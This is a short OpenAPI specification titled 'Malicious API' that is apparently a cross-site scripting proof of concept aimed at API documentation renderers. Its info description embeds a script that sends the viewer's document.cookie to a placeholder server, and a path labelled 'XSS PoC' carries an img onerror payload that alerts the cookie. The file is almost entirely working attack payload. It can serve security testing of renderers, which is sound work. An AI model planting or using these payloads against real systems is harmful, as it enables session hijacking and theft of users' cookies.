openapi: "3.0.0"
info:
  title: "Malicious API"
  version: "1.0"
  description: |
    <script>
      new Image().src = "https://YOUR_SERVER/log?cookie=" + document.cookie;
    </script>
paths:
  /test:
    get:
      summary: "XSS PoC"
      description: |
        <img src=x onerror="alert(document.cookie)">
      responses:
        "200":
          description: "OK"
